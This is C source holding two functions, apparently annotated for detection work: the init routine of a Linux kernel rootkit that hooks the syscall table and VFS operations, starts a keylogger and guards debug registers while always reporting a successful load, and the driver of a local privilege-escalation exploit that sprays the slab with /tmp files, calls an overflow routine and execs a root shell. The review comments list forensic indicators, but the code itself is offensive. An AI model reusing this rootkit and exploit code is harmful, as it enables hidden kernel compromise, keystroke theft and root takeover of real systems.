/*
 * Module entry point for the rootkit.
 *
 * Resolves kernel symbols, sets up the architecture-specific hardware
 * breakpoint layer, then switches on each feature selected in rk_cfg.
 *
 * Always returns 0, including when an early setup step fails, so the
 * module loader reports a successful load either way. In the failure case
 * no feature is enabled and rk_cfg.state is left untouched.
 *
 * NOTE(review): the helpers are not visible here. Judging by their names,
 * the areas an integrity check should cover on a host where this module
 * may have loaded are the syscall table, the VFS operations, keyboard
 * input handling and the debug registers. Confirm against the helper
 * bodies.
 */
static int __init anima_init(void)
{
	pr_debug("%s: init\n", __func__);

	/* MUST be called first */
	if (get_kernel_syms())
		return 0;

	/* architecture specific */
	if (arch_hw_breakpoint_init())
		return 0;

	arch_hw_breakpoint_debug();

	/* Optional features, each gated by its own rk_cfg flag. */
	if (rk_cfg.hook_syscall)
		hook_sys_call_table();

	if (rk_cfg.hook_vfs)
		vfs_hook();

	if (rk_cfg.keylogger)
		keylogger_init();

#if ARCH_X86
	/* x86 only; presumably guards the debug registers (TODO confirm). */
	if (rk_cfg.dr_protect)
		x86_hw_breakpoint_protect_enable();
#endif

	rk_cfg.state = RK_ACTIVE;
	return 0;
}
/*
 * Driver for a local privilege-escalation proof of concept.
 *
 * Sequence visible in this function:
 *   1. get_kernel_syms() is called; its return value is ignored.
 *   2. Files named /tmp/tmpfile<N> are opened until open() fails.
 *   3. A few of those descriptors are closed again (count from argv[1],
 *      default 1).
 *   4. do_overflow() runs (defined elsewhere, not visible here).
 *   5. Every descriptor is written to and closed.
 *   6. setresuid(0, 0, 0) decides success; on success /bin/sh is exec'd.
 *
 * Observable artifacts for detection and forensics, from the code below:
 *   - one process creating sequentially numbered /tmp/tmpfile<N> files in a
 *     tight loop until open() starts failing;
 *   - those files are never unlinked in this function, so they stay on disk;
 *   - a setresuid(0, 0, 0) call followed by an exec of /bin/sh; the call
 *     succeeding in a process that did not start as root is the indicator.
 *
 * Returns 1 only if execl() itself fails; exits with status 1 when
 * setresuid() fails.
 */
int main(int argc, char ** argv) {
    int i, nbfiles;
    int * files;
    char tmpfile[100];

    get_kernel_syms();

    files = malloc(sizeof(int));

    //check_slabs();

    /* Spray slab with file structs */
    /* The loop has no upper bound of its own; it stops at the first open()
     * failure (presumably the per-process descriptor limit; confirm). */
    for (i=0;;i++) {
        sprintf(tmpfile, "/tmp/tmpfile%d", i);
        files = realloc(files, (i+1)*sizeof(int));
        /* NOTE(review): O_CREAT is passed without a mode argument, so the
         * permission bits of the created files are indeterminate. */
        if ((files[i] = open(tmpfile, O_RDWR|O_CREAT|O_SYNC)) < 0)
            break;
    }

    //check_slabs();

    printf("[+] Created %d files\n", nbfiles = i);

    /* We cannot check slab info
     * so may not be properly aligned
     * (should work with argv[1] = 3) */
    for (i=0;i< (argc > 1 ? atoi(argv[1]) : 1);i++) {
        close(files[nbfiles-4-i]);
    }

    /* Defined elsewhere; presumably the step that triggers the kernel bug. */
    do_overflow();

    /* Writes go to every stored descriptor number, including the ones
     * closed above; return values are ignored. */
    for (i=0;i<nbfiles;i++)
        write(files[i], "YOUPI", 5);

    for (i=0;i<nbfiles;i++)
        close(files[i]);

    /* Success check: setresuid() returns non-zero when the caller is not
     * allowed to become uid 0. */
    if (setresuid(0, 0, 0)) {
        printf("[-] Exploit failed :(\n");
        exit(1);
    }

    /* Return value is not checked. */
    setresgid(0, 0, 0);

    printf("[+] Launching root shell!\n");
    execl("/bin/sh", "/bin/sh", NULL);

    /* Reached only if execl() failed. */
    return 1;
}